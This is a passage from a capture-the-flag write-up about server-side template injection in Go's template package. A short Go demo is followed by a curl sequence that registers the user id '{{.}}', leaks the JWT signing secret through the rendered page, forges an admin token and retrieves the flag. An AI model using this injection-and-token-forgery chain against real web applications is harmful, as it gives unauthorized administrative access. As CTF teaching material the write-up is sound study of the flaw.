type SSTI struct { privateMember string PublicMember string value int }
func main() { ssti := SSTI{ privateMember : "private", PublicMember : "public", value : 1, } tpl, _ := template.New("").Parse("Here is {{.}} \n") tpl.Execute(os.Stdout, ssti) // print "Here is {private public 1}" tpl, _ = template.New("").Parse("Here is {{.PublicMember}} \n") tpl.Execute(os.Stdout, ssti) // print "Here is public" tpl, _ = template.New("").Parse("Here is {{printf \"%s\" \"asdf\"}} \n") tpl.Execute(os.Stdout, ssti) // print "Here is asdf"" }
0x4 Solution
register as userid = {{.}} using /regist
get token using /auth to get a token
using this token to get jwt secret (which is fasdf972u1031xu90zm10Av)
using the jwt secret to forget a jwt token.
get the flag
1 2 3 4 5 6 7 8 9 10 11 12 13
$ curl --request GET 'http://34.146.226.125/regist?id=%7B%7B%2E%7D%7D1&pw=asdf' {"status":true,"msg":""}
$ curl --request GET 'http://34.146.226.125/auth?id=%7B%7B%2E%7D%7D&pw=asdf' {"status":true,"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOmZhbHNlfQ.rthp4OaE1Iau8Q9PIxoB-F9VGukYpbX1I-GpPPDSGhM"}
$ curl --header 'X-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOmZhbHNlfQ.rthp4OaE1Iau8Q9PIxoB-F9VGukYpbX1I-GpPPDSGhM' --request GET 'http://34.146.226.125/' Logged in as {{{.}} asdf false fasdf972u1031xu90zm10Av}
$ curl --header 'X-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOnRydWUsImlhdCI6MTY0ODUyMjgzMn0.nsbn28xiVYZkPPJqAJYv01PEGYuugWBIyriBaB7hcIY' --request GET 'http://34.146.226.125/flag' {"status":true,"msg":"Hi {{.}}, flag is LINECTF{country_roads_takes_me_home}"}